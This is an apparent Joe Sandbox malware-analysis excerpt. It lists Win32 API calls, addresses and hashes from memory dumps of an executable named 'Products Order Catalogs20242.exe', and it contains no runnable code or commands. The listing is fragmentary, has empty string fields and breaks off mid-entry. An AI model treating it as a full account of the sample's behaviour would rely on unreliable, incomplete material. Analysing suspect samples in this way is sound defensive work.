                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 1803633139-0
                                                                                                • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                APIs
                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                • String ID:
                                                                                                • API String ID: 3275902921-0
                                                                                                • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                APIs
                                                                                                • SendMessageW.USER32 ref: 004554DF
                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                • String ID:
                                                                                                • API String ID: 3691411573-0
                                                                                                • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                                • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                                                • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                                                • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                • String ID:
                                                                                                • API String ID: 1814673581-0
                                                                                                • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                • String ID:
                                                                                                • API String ID: 2833360925-0
                                                                                                • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                APIs
                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                • EndPath.GDI32(?), ref: 0044724E
                                                                                                • StrokePath.GDI32(?), ref: 0044725C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                • String ID:
                                                                                                • API String ID: 372113273-0
                                                                                                • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                APIs
                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Virtual
                                                                                                • String ID:
                                                                                                • API String ID: 4278518827-0
                                                                                                • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                APIs
                                                                                                • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsDevice$Release
                                                                                                • String ID:
                                                                                                • API String ID: 1035833867-0
                                                                                                • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                                APIs
                                                                                                • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                  • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3495660284-0
                                                                                                • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                • String ID:
                                                                                                • API String ID: 839392675-0
                                                                                                • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\Products Order Catalogs20242.exe,00000004), ref: 00436055
                                                                                                • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                • GetLastError.KERNEL32 ref: 00436081
                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                • String ID:
                                                                                                • API String ID: 1690418490-0
                                                                                                • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                APIs
                                                                                                  • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                • CoUninitialize.OLE32 ref: 00475D71
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                • String ID: .lnk$HH
                                                                                                • API String ID: 886957087-3121654589
                                                                                                • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                                • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$Delete$InfoItem_memset
                                                                                                • String ID: 0
                                                                                                • API String ID: 1173514356-4108050209
                                                                                                • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                                • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$_wcslen
                                                                                                • String ID: ComboBox$ListBox
                                                                                                • API String ID: 763830540-1403004172
                                                                                                • Opcode ID: 61f9ca9c5a419efdf5b0fec418701a37d71c48c53c791e94f016d44e45ec48a7
                                                                                                • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                                • Opcode Fuzzy Hash: 61f9ca9c5a419efdf5b0fec418701a37d71c48c53c791e94f016d44e45ec48a7
                                                                                                • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentHandleProcess$Duplicate
                                                                                                • String ID: nul
                                                                                                • API String ID: 2124370227-2873401336
                                                                                                • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                  • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                  • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                Strings
